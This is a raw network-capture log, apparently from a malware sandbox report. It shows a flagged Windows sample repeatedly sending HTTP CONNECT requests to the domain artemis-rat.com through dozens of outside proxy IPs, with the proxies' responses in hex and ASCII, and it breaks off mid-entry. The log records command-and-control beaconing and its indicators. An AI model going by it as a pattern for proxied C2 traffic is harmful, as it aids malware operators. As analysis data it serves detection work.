                                              Mar 11, 2024 08:37:17.417012930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.572393894 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              98192.168.2.45019638.162.27.14931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.426466942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.839623928 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              99192.168.2.45013191.107.180.25807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.426635027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.736238956 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              100192.168.2.450098156.67.217.159807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.430197954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.780344009 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              101192.168.2.4501401.15.62.1256787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.437251091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              102192.168.2.450155121.159.146.251807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.439229012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              103192.168.2.450270104.16.106.234807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.443636894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.598102093 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              104192.168.2.450094110.78.81.10780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.445538998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.209949017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.319308996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.166573048 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              105192.168.2.450219174.138.176.75358917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.450762033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.675669909 CET24INHTTP/1.1 403 #string


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              106192.168.2.45023312.176.231.147807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.451584101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.657672882 CET169INHTTP/1.0 400 Bad request
                                              cache-control: no-cache
                                              content-type: text/html
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              107192.168.2.450169196.20.125.12980837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.460253954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              108192.168.2.45023823.152.40.1431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.467405081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:49.140974998 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              109192.168.2.45019520.210.113.32807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.468924046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.729557991 CET319INHTTP/1.1 403 Forbidden
                                              Server: squid
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 17
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              X-Cache: MISS from cdn-fintech.info
                                              X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                              Connection: keep-alive
                                              Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                              Data Ascii: ERR_ACCESS_DENIED


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              110192.168.2.450302172.67.200.220807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.479479074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.633507013 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              111192.168.2.450306104.20.125.124807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.482635975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.637058020 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              112192.168.2.450250198.199.120.6580007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.487864017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              113192.168.2.450313104.16.105.198807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.488547087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.642587900 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              114192.168.2.450403202.159.35.1614437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.500544071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              115192.168.2.450408202.159.35.1614437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.504034996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              116192.168.2.450409202.159.35.1614437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.504720926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              117192.168.2.45023968.1.210.16341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.505081892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              118192.168.2.450411202.159.35.1614437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.505239964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              119192.168.2.450324104.16.207.86807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.505677938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.659965992 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              120192.168.2.450419178.132.4.534437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.516212940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              121192.168.2.450425178.132.4.534437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.517481089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              122192.168.2.450177202.139.198.1530507284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.519406080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.684303999 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 